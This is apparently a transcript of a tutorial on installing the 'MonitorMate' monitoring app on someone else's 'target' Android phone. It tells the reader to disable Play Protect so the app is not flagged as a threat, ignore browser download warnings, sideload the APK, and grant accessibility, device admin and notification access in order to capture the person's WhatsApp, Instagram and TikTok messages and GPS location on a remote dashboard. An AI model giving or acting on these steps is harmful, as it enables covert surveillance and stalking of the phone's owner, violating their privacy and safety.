This is how you set up MonitorMate in less than 5 minutes. First, go to the MonitorMate web dashboard. Create your account with an email you check effectively. This is where your alerts go. Verify your email with the OTP we send you, and this is your command center. You'll need it ready before you touch the target phone. Now grab the target Android device. Before you download anything, open the Play Store, tap the profile icon, and go to Play Protect. Tap the settings gear and toggle. Scan apps with Play Protect to off. Confirm the switch. This prevents Android from flagging the monitoring software as a threat during installation. Don't skip this. Open Chrome and go to monitormate.app/download.html. Tap Download APK. If the browser warns you about the file, don't worry. This is standard for monitoring tools. Tap Download anyway, open the file and hit Install. Open the app and log in with the account you just created. Check your email for the verification code and punch it in. Now the app needs access to do its job. You'll be guided through a list of permissions like location, contacts, and notifications. Tap Grant, then Allow. When asked for accessibility or device admin access, find MonitorMate in the list and toggle it on. Do not skip this. These permissions power the key features like WhatsApp monitoring and GPS. But pay attention here. When asked for notification access, find MonitorMate in the list in Special Access and toggle it on. This is how you capture incoming messages from WhatsApp, Instagram, and TikTok. Without this, you miss the chats. Allow it, then hit back to continue. Now go to your web dashboard and click Add Device. A QR code will appear. On the phone app, select Settings, click Link Account, scan the code. Bang, you're logged in, and the device is instantly linked to your account. And you are done. Put the phone down and head back to your web dashboard. Your data will start syncing immediately. Congratulations!